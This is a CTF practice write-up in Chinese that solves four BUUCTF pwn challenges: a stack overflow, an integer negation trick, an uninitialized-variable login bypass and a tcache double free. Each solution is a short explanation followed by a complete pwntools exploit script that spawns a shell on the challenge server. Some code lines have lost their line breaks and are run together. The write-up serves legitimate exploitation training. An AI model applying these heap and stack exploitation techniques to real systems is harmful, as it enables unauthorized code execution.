PWN-PRACTICE-BUUCTF-26
- 护网杯_2018_gettingstart
- wustctf2020_number_game
- picoctf_2018_are you root
- ciscn_2019_en_3
护网杯_2018_gettingstart
read到buf的时候有溢出,覆写v5为0x7FFFFFFFFFFFFFFF,v6为0x3FB999999999999A
from pwn import *
io=remote("node4.buuoj.cn",29057)
io.recvuntil("But Whether it starts depends on you.\n")
v5=0x7FFFFFFFFFFFFFFF
v6=0x3FB999999999999A
payload=p64(0)*3+p64(v5)+p64(v6)
io.send(payload)
io.sendline("cat flag")
io.interactive()
wustctf2020_number_game
neg对操作数执行求补运算:用零减去操作数,然后结果返回操作数
求补运算也可以表达成:将操作数按位取反后加1
0x80000000按位取反后加1,仍然是0x80000000,发送-2147483648即可
from pwn import *
#io=process("./wustctf2020_number_game")
io=remote("node4.buuoj.cn",29209)
elf=ELF("./wustctf2020_number_game")
io.sendline("-2147483648")
io.sendline("cat flag")
io.interactive()
picoctf_2018_are you root
未初始化验证漏洞,参考:PicoCTF_2018_are_you_root(未初始化验证漏洞)
# -*- coding:utf-8 -*-
from pwn import *
#io = process('./PicoCTF_2018_are_you_root')
io = remote('node4.buuoj.cn',26285)def login(name):io.sendlineafter('>','login ' + name)def reset():io.sendlineafter('>','reset')def getFlag():io.sendlineafter('>','get-flag')login('a'*0x8 + p64(0x5))
reset()
login('P1umH0')
getFlag()io.interactive()
ciscn_2019_en_3
puts泄露libc,uaf + double free,参考:ciscn_2019_en_3 tcache
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./ciscn_2019_en_3")
io=remote("node4.buuoj.cn",29625)
elf=ELF("./ciscn_2019_en_3")
libc=ELF("./libc-2.27-18-x64.so")io.sendlineafter("What's your name?\n","P1umH0")
io.sendlineafter("Please input your ID.\n","a"*8)
setbuffer_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-231
libc_base=setbuffer_addr-libc.sym["setbuffer"]
free_hook=libc_base+libc.sym["__free_hook"]
system=libc_base+libc.sym["system"]def add(size,content):io.sendlineafter("Input your choice:","1")io.sendlineafter("Please input the size of story: \n",str(size))io.sendlineafter("please inpute the story: \n",content)
def edit():io.sendlineafter("Input your choice:","2")
def show():io.sendlineafter("Input your choice:","3")
def free(index):io.sendlineafter("Input your choice:","4")io.sendlineafter("Please input the index:\n",str(index))
def exit():io.sendlineafter("Input your choice:","5")#gdb.attach(io)
#pause()add(0x20,"aaaa")#0
add(0x20,"/bin/sh\x00")#1#pause()free(0)
free(0)#pause()add(0x20,p64(free_hook))#pause()add(0x20,"bbbb")#pause()add(0x20,p64(system))#pause()free(1)io.interactive()
